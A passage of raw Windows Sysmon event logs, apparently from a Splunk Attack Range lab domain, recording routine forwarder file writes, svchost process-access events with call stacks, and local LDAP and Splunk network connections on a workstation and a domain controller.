Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000291724Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:26.578{BEA10069-027A-6088-022A-00000000BB01}6628C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{BEA10069-D0C1-6086-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{BEA10069-D13E-6086-9900-00000000BB01}408C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000291723Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:26.362{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1468EF0E3A45D33C0BA729C7301CAD96,SHA256=DC1FE116561C5D6A2A3A3678D50AAD90DDD8F92483D7CEF0AC9555C5CCC8AD58,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000440598Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:23.237{42DC5269-CE96-6086-0B00-00000000BA01}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-932.attackrange.local62414-true0:0:0:0:0:0:0:1win-dc-932.attackrange.local389ldap 354300x8000000000000000440597Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:23.237{42DC5269-CEA9-6086-2300-00000000BA01}2704C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-932.attackrange.local62414-true0:0:0:0:0:0:0:1win-dc-932.attackrange.local389ldap 23542300x8000000000000000440596Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:26.404{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=24246D951B7A01B2B21320A4315BBC5D,SHA256=D153FC96C1E43708E14095F54246BC07F856790AC70812079AB265A4CD555709,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000440595Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:26.210{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440594Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:26.210{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000291722Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:26.177{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E908A59AA7AEA8265A5A97109CE6D316,SHA256=9709AC22404E621DBA83B539FF43171354C5FA9DFC97D9FD38BC628A3763FE10,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000440601Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:27.411{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8030900B2AC99822E0294FF546DD5866,SHA256=592E28AC27268F1B58F867BCCA8A157FF7625152271F4B6B2AE29F2BA37BA04E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291739Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:27.679{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2EC76A35A163C2A5C635CDFA41EC2A6D,SHA256=76B31B8049AB3843458D699A9F2403B18E77128CFF0E9015D4A2A72B6189F0AC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291738Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:27.364{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=72C3D65E1AAF10A71182E8786FB32CDD,SHA256=714C132BE874D6A2879FDA02D23063E7E4889696726A46FEB922A0653D2ED9FD,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000440600Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:27.210{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440599Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:27.210{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x8000000000000000440606Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:25.565{42DC5269-CF43-6086-D800-00000000BA01}4100C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-932.attackrange.local62415-false10.0.1.12-8000- 23542300x8000000000000000440605Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:28.430{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1EF85C533AF8933B28E9C0440DA38FB7,SHA256=D8F8A4F20807FECAAEB53B2E24F69172AFC2FE1E40996AA79920738AACDC25D0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291740Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:28.381{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C834AAC24E70F486DBCE825566E9EFB0,SHA256=CF2AA485FCD4379835CB928F059B3047417340D9641FB99ADC3C40E6F7F1D24E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000440604Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:28.334{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=6E7DF3CF5A71D8B021A2B75F3FA8F2D0,SHA256=26C7D137C44B7A11E1EA16832BCF9D796394E6FD91F3D81275E4F9A4B9620E56,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000440603Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:28.211{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440602Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:28.211{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000440609Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:29.539{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AADBED3FB05A15D157AD8D9DBE793C6A,SHA256=5B54D5AFB011AC6AEAB916FF6C40BFA8DBF01F0D866233B64306CBFDB2309C9F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291741Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:29.414{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=785EDA7DDAE805C43BC7E10AA5808EB6,SHA256=F2AC463CBFFF0869EA754BAB774D9C2F0ED0C4018269F260C1712D838413C19C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000440608Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:29.212{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440607Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:29.212{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000440612Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:30.547{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7AA69918A29ECBC7682DD8ABF6F29686,SHA256=E81B7D27E9A2E05DB566400F191D482AAD984DBF4C0F511B2241AB45E5B83059,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291742Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:30.416{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=16E37AA4B80234C4CFC63994C419AF00,SHA256=D9F23E188C478A9B404D8EB8519FE1429448CCF7B879A33253BF72CFE62E9CA5,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000440611Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:30.212{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440610Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:30.212{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000440615Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:31.567{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2AED681F32622E3CAED84ED58B787015,SHA256=C4B05E71E50FD0506C519479248F71A024F483203C69E4044DC115A053F89B0B,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000291745Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:29.481{BEA10069-D145-6086-C700-00000000BB01}2620C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-96.attackrange.local50629-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x8000000000000000291744Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:31.455{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FB49F73F16406C2294589C93F9EDEFEF,SHA256=0C446016262021384411DFBB8FAE684E04CE98C2E58303C44935DBC01D808FE6,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000440614Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:31.213{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440613Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:31.213{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000291743Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:31.186{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=CCF505AFA1A7EA03EF94EE9AC9B7A628,SHA256=651FCBD36FF759528CC889495C3A318CFAFC4145FB3C50F6E80A910FF074F67E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000440618Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:32.584{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9BDD3070792C9615FA96BEC7CC9E3435,SHA256=DCA67B5BBE94C8700FBAB8DD7DA97237C3A99F7918EDB4A37EC03620FD8B3B2C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291746Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:32.457{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9B9E498E6663756659F270F5BDFE3DDB,SHA256=AE0040E850F48A2F0BF341264FA4A9B9D1F572BF49BEF2E35DA0B80A32D172C1,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000440617Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:32.214{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440616Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:32.214{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000440622Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:33.812{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1E9FDF5B969A3D0F2BE355E6E5DCFD88,SHA256=08B1D738800BBA8E77BBBE3F01B04A4862AD1E433C59827453E1A1F789BF0C66,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291747Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:33.459{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B046AC2FBBBF7274C158B192F6BA02DB,SHA256=DF0C85982FB392875447A5A6705D8AB3A4BE12352B4134267F7E1C38E872BEA2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000440621Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:33.240{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=72BCBB52CB620B0C3E840FCFF439CF4B,SHA256=405916FB165A351A5DC6570C73D33120D4F8585B9C30857745D7B7E221D5B554,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000440620Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:33.215{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440619Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 